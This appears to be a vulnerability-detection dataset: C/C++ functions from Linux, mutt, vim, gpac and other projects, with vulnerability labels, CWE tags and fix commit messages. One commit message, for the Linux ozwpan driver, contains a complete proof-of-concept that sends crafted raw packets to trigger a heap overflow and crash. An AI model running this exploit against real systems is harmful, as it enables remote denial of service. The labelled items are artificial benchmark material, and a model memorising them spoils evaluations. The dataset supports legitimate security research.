This makes all integer type conversions that have potential data loss
explicit with calls that do range checks and raise an exception. After
this commit, qpdf builds with no warnings when -Wsign-conversion
-Wconversion is used with gcc or clang or when -W3 -Wd4800 is used
with MSVC. This significantly reduces the likelihood of potential
crashes from bogus integer values.
There are some parts of the code that take int when they should take
size_t or an offset. Such places would make qpdf not support files
with more than 2^31 of something that usually wouldn't be so large. In
the event that such a file shows up and is valid, at least qpdf would
raise an error in the right spot so the issue could be legitimately
addressed rather than failing in some weird way because of a silent
overflow condition.
|
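The commit above replaces implicit narrowing conversions with range-checked ones that fail loudly. qpdf itself is C++ and throws an exception; the sketch below expresses the same idea in C with a status return, to stay consistent with the rest of this page.

#include <stddef.h>
#include <limits.h>

/* Narrow a size_t to int only when the value fits; otherwise report
 * failure instead of silently wrapping to a bogus (often negative) value. */
static int size_to_int_checked(size_t value, int *out)
{
    if (value > (size_t) INT_MAX)
        return -1;   /* the caller raises an error at the right spot */
    *out = (int) value;
    return 0;
}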
static void oz_hcd_stop(struct usb_hcd *hcd)
{
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 179,744,483,976,964,360,000,000,000,000,000,000,000 | 3 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
void MainWindow::updateAutoSave()
{
if (!m_autosaveTimer.isActive())
m_autosaveTimer.start();
}
| 0 |
[
"CWE-89",
"CWE-327",
"CWE-295"
] |
shotcut
|
f008adc039642307f6ee3378d378cdb842e52c1d
| 62,049,208,134,240,460,000,000,000,000,000,000,000 | 5 |
fix upgrade check not using TLS correctly
|
static u32 ilog(u32 v, Bool dec)
{
u32 ret = 0;
if (dec && v) --v;
while (v) {
ret++;
v >>= 1;
}
return (ret);
}
| 0 |
[
"CWE-190",
"CWE-787"
] |
gpac
|
51cdb67ff7c5f1242ac58c5aa603ceaf1793b788
| 76,736,610,381,083,160,000,000,000,000,000,000,000 | 10 |
add safety in avc/hevc/vvc sps/pps/vps ID check - cf #1720 #1721 #1722
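For reference, ilog(v, 0) above returns the bit length of v, while ilog(v, 1) computes ceil(log2(v)); a small self-check, assuming the function above is in scope:
#include <assert.h>
int main(void)
{
	assert(ilog(8, 0) == 4);  /* bit length of 0b1000 */
	assert(ilog(8, 1) == 3);  /* ceil(log2(8)): v is decremented first */
	assert(ilog(1, 1) == 0);  /* ceil(log2(1)) == 0 */
	return 0;
}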
|
char *timelib_timezone_id_from_abbr(const char *abbr, timelib_long gmtoffset, int isdst)
{
const timelib_tz_lookup_table *tp;
tp = abbr_search(abbr, gmtoffset, isdst);
if (tp) {
return (tp->full_tz_name);
} else {
return NULL;
}
}
| 0 |
[
"CWE-125"
] |
php-src
|
5c0455bf2c8cd3c25401407f158e820aa3b239e1
| 241,803,949,217,302,800,000,000,000,000,000,000,000 | 11 |
Merge branch 'PHP-7.0' into PHP-7.1
* PHP-7.0:
Fixed bug #75055 Out-Of-Bounds Read in timelib_meridian()
Apply upstream patch for CVE-2016-1283
|
static unsigned long gfn_to_hva_many(struct kvm_memory_slot *slot, gfn_t gfn,
gfn_t *nr_pages)
{
	return __gfn_to_hva_many(slot, gfn, nr_pages, true);
}
| 0 |
[
"CWE-459"
] |
linux
|
683412ccf61294d727ead4a73d97397396e69a6b
| 57,953,947,549,919,850,000,000,000,000,000,000,000 | 5 |
KVM: SEV: add cache flush to solve SEV cache incoherency issues
Flush the CPU caches when memory is reclaimed from an SEV guest (where
reclaim also includes it being unmapped from KVM's memslots). Due to lack
of coherency for SEV encrypted memory, failure to flush results in silent
data corruption if userspace is malicious/broken and doesn't ensure SEV
guest memory is properly pinned and unpinned.
Cache coherency is not enforced across the VM boundary in SEV (AMD APM
vol.2 Section 15.34.7). Confidential cachelines, generated by confidential
VM guests have to be explicitly flushed on the host side. If a memory page
containing dirty confidential cachelines was released by VM and reallocated
to another user, the cachelines may corrupt the new user at a later time.
KVM takes a shortcut by assuming all confidential memory remain pinned
until the end of VM lifetime. Therefore, KVM does not flush cache at
mmu_notifier invalidation events. Because of this incorrect assumption and
the lack of cache flushing, malicous userspace can crash the host kernel:
creating a malicious VM and continuously allocates/releases unpinned
confidential memory pages when the VM is running.
Add cache flush operations to mmu_notifier operations to ensure that any
physical memory leaving the guest VM get flushed. In particular, hook
mmu_notifier_invalidate_range_start and mmu_notifier_release events and
flush cache accordingly. The hook runs after releasing the mmu lock to
avoid contention with other vCPUs.
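The shape of the hook can be sketched as follows (a conceptual sketch only; the callback name and the kvm_is_sev_guest() predicate are assumptions, not the upstream patch):
/* Called from KVM's mmu_notifier paths when guest pages are reclaimed,
 * so SEV hosts can flush the non-coherent confidential cachelines. */
static void guest_memory_reclaimed_sketch(struct kvm *kvm)
{
	if (kvm_is_sev_guest(kvm))      /* hypothetical predicate */
		wbinvd_on_all_cpus();   /* flush caches on all CPUs */
}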
Cc: [email protected]
Suggested-by: Sean Christpherson <[email protected]>
Reported-by: Mingwei Zhang <[email protected]>
Signed-off-by: Mingwei Zhang <[email protected]>
Message-Id: <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
err_readonly (s)
const char *s;
{
report_error (_("%s: readonly variable"), s);
}
| 0 |
[] |
bash
|
863d31ae775d56b785dc5b0105b6d251515d81d5
| 201,659,239,858,027,600,000,000,000,000,000,000,000 | 5 |
commit bash-20120224 snapshot
|
struct ib_ucontext *ib_uverbs_get_ucontext_file(struct ib_uverbs_file *ufile)
{
/*
* We do not hold the hw_destroy_rwsem lock for this flow, instead
* srcu is used. It does not matter if someone races this with
* get_context, we get NULL or valid ucontext.
*/
struct ib_ucontext *ucontext = smp_load_acquire(&ufile->ucontext);
if (!srcu_dereference(ufile->device->ib_dev,
&ufile->device->disassociate_srcu))
return ERR_PTR(-EIO);
if (!ucontext)
return ERR_PTR(-EINVAL);
return ucontext;
}
| 0 |
[
"CWE-362",
"CWE-703",
"CWE-667"
] |
linux
|
04f5866e41fb70690e28397487d8bd8eea7d712a
| 112,555,516,952,396,940,000,000,000,000,000,000,000 | 18 |
coredump: fix race condition between mmget_not_zero()/get_task_mm() and core dumping
The core dumping code has always run without holding the mmap_sem for
writing, despite that is the only way to ensure that the entire vma
layout will not change from under it. Only using some signal
serialization on the processes belonging to the mm is not nearly enough.
This was pointed out earlier. For example in Hugh's post from Jul 2017:
https://lkml.kernel.org/r/[email protected]
"Not strictly relevant here, but a related note: I was very surprised
to discover, only quite recently, how handle_mm_fault() may be called
without down_read(mmap_sem) - when core dumping. That seems a
misguided optimization to me, which would also be nice to correct"
In particular because the growsdown and growsup can move the
vm_start/vm_end the various loops the core dump does around the vma will
not be consistent if page faults can happen concurrently.
Pretty much all users calling mmget_not_zero()/get_task_mm() and then
taking the mmap_sem had the potential to introduce unexpected side
effects in the core dumping code.
Adding mmap_sem for writing around the ->core_dump invocation is a
viable long term fix, but it requires removing all copy user and page
faults and to replace them with get_dump_page() for all binary formats
which is not suitable as a short term fix.
For the time being this solution manually covers the places that can
confuse the core dump either by altering the vma layout or the vma flags
while it runs. Once ->core_dump runs under mmap_sem for writing the
function mmget_still_valid() can be dropped.
Allowing mmap_sem protected sections to run in parallel with the
coredump provides some minor parallelism advantage to the swapoff code
(which seems to be safe enough by never mangling any vma field and can
keep doing swapins in parallel to the core dumping) and to some other
corner case.
In order to facilitate the backporting I added "Fixes: 86039bd3b4e6"
however the side effect of this same race condition in /proc/pid/mem
should be reproducible since before 2.6.12-rc2 so I couldn't add any
other "Fixes:" because there's no hash beyond the git genesis commit.
Because find_extend_vma() is the only location outside of the process
context that could modify the "mm" structures under mmap_sem for
reading, by adding the mmget_still_valid() check to it, all other cases
that take the mmap_sem for reading don't need the new check after
mmget_not_zero()/get_task_mm(). The expand_stack() in page fault
context also doesn't need the new check, because all tasks under core
dumping are frozen.
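The helper's intent fits in one line; a sketch under the assumption that an in-flight dump is signalled via mm->core_state (the real definition lives in the mm headers):
/* Sketch: an mm obtained via mmget_not_zero()/get_task_mm() must be
 * treated as unstable while a core dump may be in progress. */
static inline bool mmget_still_valid_sketch(struct mm_struct *mm)
{
	return likely(!mm->core_state);  /* core_state set => dumping */
}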
Link: http://lkml.kernel.org/r/[email protected]
Fixes: 86039bd3b4e6 ("userfaultfd: add new syscall to provide memory externalization")
Signed-off-by: Andrea Arcangeli <[email protected]>
Reported-by: Jann Horn <[email protected]>
Suggested-by: Oleg Nesterov <[email protected]>
Acked-by: Peter Xu <[email protected]>
Reviewed-by: Mike Rapoport <[email protected]>
Reviewed-by: Oleg Nesterov <[email protected]>
Reviewed-by: Jann Horn <[email protected]>
Acked-by: Jason Gunthorpe <[email protected]>
Acked-by: Michal Hocko <[email protected]>
Cc: <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static int psi_io_show(struct seq_file *m, void *v)
{
return psi_show(m, &psi_system, PSI_IO);
}
| 0 |
[
"CWE-787"
] |
linux
|
6fcca0fa48118e6d63733eb4644c6cd880c15b8f
| 43,068,382,344,452,130,000,000,000,000,000,000,000 | 4 |
sched/psi: Fix OOB write when writing 0 bytes to PSI files
Issuing write() with count parameter set to 0 on any file under
/proc/pressure/ will cause an OOB write because of the access to
buf[buf_size-1] when NUL-termination is performed. Fix this by checking
for buf_size to be non-zero.
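Reduced to a sketch, the pattern and the fix look like this (names illustrative, not the psi code):
/* A zero count makes buf[count - 1] index buf[-1]; rejecting it up
 * front keeps the NUL-termination in bounds. */
static ssize_t write_sketch(const char __user *ubuf, size_t count)
{
	char buf[32];
	if (!count)                     /* the fix: reject 0-byte writes */
		return -EINVAL;
	if (count >= sizeof(buf))
		count = sizeof(buf) - 1;
	if (copy_from_user(buf, ubuf, count))
		return -EFAULT;
	buf[count - 1] = '\0';          /* safe only because count >= 1 */
	return count;
}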
Signed-off-by: Suren Baghdasaryan <[email protected]>
Signed-off-by: Peter Zijlstra (Intel) <[email protected]>
Signed-off-by: Ingo Molnar <[email protected]>
Acked-by: Johannes Weiner <[email protected]>
Link: https://lkml.kernel.org/r/[email protected]
|
static int __choose_path_in_pg(struct multipath *m, struct priority_group *pg,
size_t nr_bytes)
{
struct dm_path *path;
path = pg->ps.type->select_path(&pg->ps, &m->repeat_count, nr_bytes);
if (!path)
return -ENXIO;
m->current_pgpath = path_to_pgpath(path);
if (m->current_pg != pg)
__switch_pg(m, m->current_pgpath);
return 0;
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
ec8013beddd717d1740cfefb1a9b900deef85462
| 194,090,205,753,367,100,000,000,000,000,000,000,000 | 16 |
dm: do not forward ioctls from logical volumes to the underlying device
A logical volume can map to just part of underlying physical volume.
In this case, it must be treated like a partition.
Based on a patch from Alasdair G Kergon.
Cc: Alasdair G Kergon <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
int mutt_socket_write_d (CONNECTION *conn, const char *buf, int len, int dbg)
{
int rc;
int sent = 0;
dprint (dbg, (debugfile,"%d> %s", conn->fd, buf));
if (conn->fd < 0)
{
dprint (1, (debugfile, "mutt_socket_write: attempt to write to closed connection\n"));
return -1;
}
if (len < 0)
len = mutt_strlen (buf);
while (sent < len)
{
if ((rc = conn->conn_write (conn, buf + sent, len - sent)) < 0)
{
dprint (1, (debugfile,
"mutt_socket_write: error writing (%s), closing socket\n",
strerror(errno)));
mutt_socket_close (conn);
return -1;
}
if (rc < len - sent)
dprint (3, (debugfile,
"mutt_socket_write: short write (%d of %d bytes)\n", rc,
len - sent));
sent += rc;
}
return sent;
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 136,562,257,276,808,640,000,000,000,000,000,000,000 | 38 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
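The mitigation amounts to discarding anything buffered before the handshake; a sketch (field names approximate mutt's CONNECTION struct):
/* Drop plaintext the server (or a MITM) sent after its STARTTLS
 * "go ahead", so it cannot be parsed as a TLS-era response. */
static void clear_conn_input(CONNECTION *conn)
{
  conn->bufpos = 0;     /* read cursor into the input buffer */
  conn->available = 0;  /* count of buffered bytes */
}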
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
|
char *
cib_recv_plaintext(int sock)
{
char *buf = NULL;
ssize_t rc = 0;
ssize_t len = 0;
ssize_t chunk_size = 512;
buf = calloc(1, chunk_size);
while (1) {
errno = 0;
rc = read(sock, buf + len, chunk_size);
crm_trace("Got %d more bytes. errno=%d", (int)rc, errno);
if (errno == EINTR || errno == EAGAIN) {
crm_trace("Retry: %d", (int)rc);
if (rc > 0) {
len += rc;
buf = realloc(buf, len + chunk_size);
CRM_ASSERT(buf != NULL);
}
} else if (rc < 0) {
crm_perror(LOG_ERR, "Error receiving message: %d", (int)rc);
goto bail;
} else if (rc == chunk_size) {
len += rc;
chunk_size *= 2;
buf = realloc(buf, len + chunk_size);
crm_trace("Retry with %d more bytes", (int)chunk_size);
CRM_ASSERT(buf != NULL);
} else if (buf[len + rc - 1] != 0) {
crm_trace("Last char is %d '%c'", buf[len + rc - 1], buf[len + rc - 1]);
crm_trace("Retry with %d more bytes", (int)chunk_size);
len += rc;
buf = realloc(buf, len + chunk_size);
CRM_ASSERT(buf != NULL);
} else {
return buf;
}
}
bail:
free(buf);
return NULL;
}
| 1 |
[
"CWE-399"
] |
pacemaker
|
564f7cc2a51dcd2f28ab12a13394f31be5aa3c93
| 336,433,643,467,537,170,000,000,000,000,000,000,000 | 50 |
High: core: Internal tls api improvements for reuse with future LRMD tls backend.
|
int dm_get_geometry(struct mapped_device *md, struct hd_geometry *geo)
{
*geo = md->geometry;
return 0;
}
| 0 |
[
"CWE-362"
] |
linux
|
b9a41d21dceadf8104812626ef85dc56ee8a60ed
| 141,450,142,856,970,200,000,000,000,000,000,000,000 | 6 |
dm: fix race between dm_get_from_kobject() and __dm_destroy()
The following BUG_ON was hit when testing repeat creation and removal of
DM devices:
kernel BUG at drivers/md/dm.c:2919!
CPU: 7 PID: 750 Comm: systemd-udevd Not tainted 4.1.44
Call Trace:
[<ffffffff81649e8b>] dm_get_from_kobject+0x34/0x3a
[<ffffffff81650ef1>] dm_attr_show+0x2b/0x5e
[<ffffffff817b46d1>] ? mutex_lock+0x26/0x44
[<ffffffff811df7f5>] sysfs_kf_seq_show+0x83/0xcf
[<ffffffff811de257>] kernfs_seq_show+0x23/0x25
[<ffffffff81199118>] seq_read+0x16f/0x325
[<ffffffff811de994>] kernfs_fop_read+0x3a/0x13f
[<ffffffff8117b625>] __vfs_read+0x26/0x9d
[<ffffffff8130eb59>] ? security_file_permission+0x3c/0x44
[<ffffffff8117bdb8>] ? rw_verify_area+0x83/0xd9
[<ffffffff8117be9d>] vfs_read+0x8f/0xcf
[<ffffffff81193e34>] ? __fdget_pos+0x12/0x41
[<ffffffff8117c686>] SyS_read+0x4b/0x76
[<ffffffff817b606e>] system_call_fastpath+0x12/0x71
The bug can be easily triggered, if an extra delay (e.g. 10ms) is added
between the test of DMF_FREEING & DMF_DELETING and dm_get() in
dm_get_from_kobject().
To fix it, we need to ensure the test of DMF_FREEING & DMF_DELETING and
dm_get() are done in an atomic way, so _minor_lock is used.
The other callers of dm_get() have also been checked to be OK: some
callers invoke dm_get() under _minor_lock, some callers invoke it under
_hash_lock, and dm_start_request() invoke it after increasing
md->open_count.
Cc: [email protected]
Signed-off-by: Hou Tao <[email protected]>
Signed-off-by: Mike Snitzer <[email protected]>
|
void update_font(ASS_Renderer *render_priv)
{
unsigned val;
ASS_FontDesc desc;
if (render_priv->state.family[0] == '@') {
desc.vertical = 1;
desc.family = strdup(render_priv->state.family + 1);
} else {
desc.vertical = 0;
desc.family = strdup(render_priv->state.family);
}
val = render_priv->state.bold;
// 0 = normal, 1 = bold, >1 = exact weight
if (val == 1 || val == -1)
val = 700; // bold
else if (val <= 0)
val = 400; // normal
desc.bold = val;
val = render_priv->state.italic;
if (val == 1)
val = 100; // italic
else if (val <= 0)
val = 0; // normal
desc.italic = val;
ass_cache_dec_ref(render_priv->state.font);
render_priv->state.font =
ass_font_new(render_priv->cache.font_cache, render_priv->library,
render_priv->ftlibrary, render_priv->fontselect,
&desc);
if (render_priv->state.font)
change_font_size(render_priv, render_priv->state.font_size);
}
| 0 |
[] |
libass
|
6835731c2fe4164a0c50bc91d12c43b2a2b4e799
| 55,450,257,706,887,520,000,000,000,000,000,000,000 | 37 |
parse_tags: don't recurse for nested \t()
This fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=4892
(stack overflow on deeply nested \t()).
This is possible because parentheses do not nest and the first ')'
terminates the whole tag. Thus something like \t(\t(\t(\t(\t() can be
read in a simple loop with no recursion required. Recursion is also
not required if the ')' is missing entirely and the outermost \t(...
never ends.
See https://github.com/libass/libass/pull/296 for more backstory.
|
static int kvm_mmu_notifier_clear_young(struct mmu_notifier *mn,
struct mm_struct *mm,
unsigned long start,
unsigned long end)
{
struct kvm *kvm = mmu_notifier_to_kvm(mn);
int young, idx;
idx = srcu_read_lock(&kvm->srcu);
spin_lock(&kvm->mmu_lock);
/*
* Even though we do not flush TLB, this will still adversely
* affect performance on pre-Haswell Intel EPT, where there is
* no EPT Access Bit to clear so that we have to tear down EPT
* tables instead. If we find this unacceptable, we can always
* add a parameter to kvm_age_hva so that it effectively doesn't
* do anything on clear_young.
*
* Also note that currently we never issue secondary TLB flushes
* from clear_young, leaving this job up to the regular system
* cadence. If we find this inaccurate, we might come up with a
* more sophisticated heuristic later.
*/
young = kvm_age_hva(kvm, start, end);
spin_unlock(&kvm->mmu_lock);
srcu_read_unlock(&kvm->srcu, idx);
return young;
}
| 0 |
[
"CWE-416"
] |
linux
|
0774a964ef561b7170d8d1b1bfe6f88002b6d219
| 98,415,859,645,318,400,000,000,000,000,000,000,000 | 29 |
KVM: Fix out of range accesses to memslots
Reset the LRU slot if it becomes invalid when deleting a memslot to fix
an out-of-bounds/use-after-free access when searching through memslots.
Explicitly check for there being no used slots in search_memslots(), and
in the caller of s390's approximation variant.
Fixes: 36947254e5f9 ("KVM: Dynamically size memslot array based on number of used slots")
Reported-by: Qian Cai <[email protected]>
Cc: Peter Xu <[email protected]>
Signed-off-by: Sean Christopherson <[email protected]>
Message-Id: <[email protected]>
Acked-by: Christian Borntraeger <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
CImg<T>& load_analyze(std::FILE *const file, float *const voxel_size=0) {
return _load_analyze(file,0,voxel_size);
}
| 0 |
[
"CWE-770"
] |
cimg
|
619cb58dd90b4e03ac68286c70ed98acbefd1c90
| 126,020,148,391,458,770,000,000,000,000,000,000,000 | 3 |
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file does not exceed file size.
|
void
QPDFObjectHandle::setObjectDescriptionFromInput(
QPDFObjectHandle object, QPDF* context,
std::string const& description, PointerHolder<InputSource> input,
qpdf_offset_t offset)
{
object.setObjectDescription(
context,
input->getName() + ", " + description +
" at offset " + QUtil::int_to_string(offset));
}
| 0 |
[
"CWE-399",
"CWE-674"
] |
qpdf
|
b4d6cf6836ce025ba1811b7bbec52680c7204223
| 334,668,883,921,846,070,000,000,000,000,000,000,000 | 10 |
Limit depth of nesting in direct objects (fixes #202)
This fixes CVE-2018-9918.
|
int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{
struct inode *inode = file_inode(vma->vm_file);
int err;
down_read(&EXT4_I(inode)->i_mmap_sem);
err = filemap_fault(vma, vmf);
up_read(&EXT4_I(inode)->i_mmap_sem);
return err;
}
| 0 |
[
"CWE-362"
] |
linux
|
ea3d7209ca01da209cda6f0dea8be9cc4b7a933b
| 152,455,331,178,243,200,000,000,000,000,000,000,000 | 11 |
ext4: fix races between page faults and hole punching
Currently, page faults and hole punching are completely unsynchronized.
This can result in page fault faulting in a page into a range that we
are punching after truncate_pagecache_range() has been called and thus
we can end up with a page mapped to disk blocks that will be shortly
freed. Filesystem corruption will shortly follow. Note that the same
race is avoided for truncate by checking page fault offset against
i_size but there isn't similar mechanism available for punching holes.
Fix the problem by creating new rw semaphore i_mmap_sem in inode and
grab it for writing over truncate, hole punching, and other functions
removing blocks from extent tree and for read over page faults. We
cannot easily use i_data_sem for this since that ranks below transaction
start and we need something ranking above it so that it can be held over
the whole truncate / hole punching operation. Also remove various
workarounds we had in the code to reduce race window when page fault
could have created pages with stale mapping information.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
static void put_reqs_available(struct kioctx *ctx, unsigned nr)
{
struct kioctx_cpu *kcpu;
preempt_disable();
kcpu = this_cpu_ptr(ctx->cpu);
kcpu->reqs_available += nr;
while (kcpu->reqs_available >= ctx->req_batch * 2) {
kcpu->reqs_available -= ctx->req_batch;
atomic_add(ctx->req_batch, &ctx->reqs_available);
}
preempt_enable();
}
| 0 |
[
"CWE-399"
] |
linux
|
d558023207e008a4476a3b7bb8706b2a2bf5d84f
| 222,834,293,112,086,900,000,000,000,000,000,000,000 | 15 |
aio: prevent double free in ioctx_alloc
ioctx_alloc() calls aio_setup_ring() to allocate a ring. If aio_setup_ring()
fails to do so it would call aio_free_ring() before returning, but
ioctx_alloc() would call aio_free_ring() again causing a double free of
the ring.
This is easily reproducible from userspace.
Signed-off-by: Sasha Levin <[email protected]>
Signed-off-by: Benjamin LaHaise <[email protected]>
|
ex_z(exarg_T *eap)
{
char_u *x;
long bigness;
char_u *kind;
int minus = 0;
linenr_T start, end, curs, i;
int j;
linenr_T lnum = eap->line2;
// Vi compatible: ":z!" uses display height, without a count uses
// 'scroll'
if (eap->forceit)
bigness = Rows - 1;
else if (!ONE_WINDOW)
bigness = curwin->w_height - 3;
else
bigness = curwin->w_p_scr * 2;
if (bigness < 1)
bigness = 1;
x = eap->arg;
kind = x;
if (*kind == '-' || *kind == '+' || *kind == '='
|| *kind == '^' || *kind == '.')
++x;
while (*x == '-' || *x == '+')
++x;
if (*x != 0)
{
if (!VIM_ISDIGIT(*x))
{
emsg(_(e_non_numeric_argument_to_z));
return;
}
else
{
bigness = atol((char *)x);
// bigness could be < 0 if atol(x) overflows.
if (bigness > 2 * curbuf->b_ml.ml_line_count || bigness < 0)
bigness = 2 * curbuf->b_ml.ml_line_count;
p_window = bigness;
if (*kind == '=')
bigness += 2;
}
}
// the number of '-' and '+' multiplies the distance
if (*kind == '-' || *kind == '+')
for (x = kind + 1; *x == *kind; ++x)
;
switch (*kind)
{
case '-':
start = lnum - bigness * (linenr_T)(x - kind) + 1;
end = start + bigness - 1;
curs = end;
break;
case '=':
start = lnum - (bigness + 1) / 2 + 1;
end = lnum + (bigness + 1) / 2 - 1;
curs = lnum;
minus = 1;
break;
case '^':
start = lnum - bigness * 2;
end = lnum - bigness;
curs = lnum - bigness;
break;
case '.':
start = lnum - (bigness + 1) / 2 + 1;
end = lnum + (bigness + 1) / 2 - 1;
curs = end;
break;
default: // '+'
start = lnum;
if (*kind == '+')
start += bigness * (linenr_T)(x - kind - 1) + 1;
else if (eap->addr_count == 0)
++start;
end = start + bigness - 1;
curs = end;
break;
}
if (start < 1)
start = 1;
if (end > curbuf->b_ml.ml_line_count)
end = curbuf->b_ml.ml_line_count;
if (curs > curbuf->b_ml.ml_line_count)
curs = curbuf->b_ml.ml_line_count;
else if (curs < 1)
curs = 1;
for (i = start; i <= end; i++)
{
if (minus && i == lnum)
{
msg_putchar('\n');
for (j = 1; j < Columns; j++)
msg_putchar('-');
}
print_line(i, eap->flags & EXFLAG_NR, eap->flags & EXFLAG_LIST);
if (minus && i == lnum)
{
msg_putchar('\n');
for (j = 1; j < Columns; j++)
msg_putchar('-');
}
}
if (curwin->w_cursor.lnum != curs)
{
curwin->w_cursor.lnum = curs;
curwin->w_cursor.col = 0;
}
ex_no_reprint = TRUE;
}
| 0 |
[
"CWE-416"
] |
vim
|
37f47958b8a2a44abc60614271d9537e7f14e51a
| 316,747,656,473,474,130,000,000,000,000,000,000,000 | 132 |
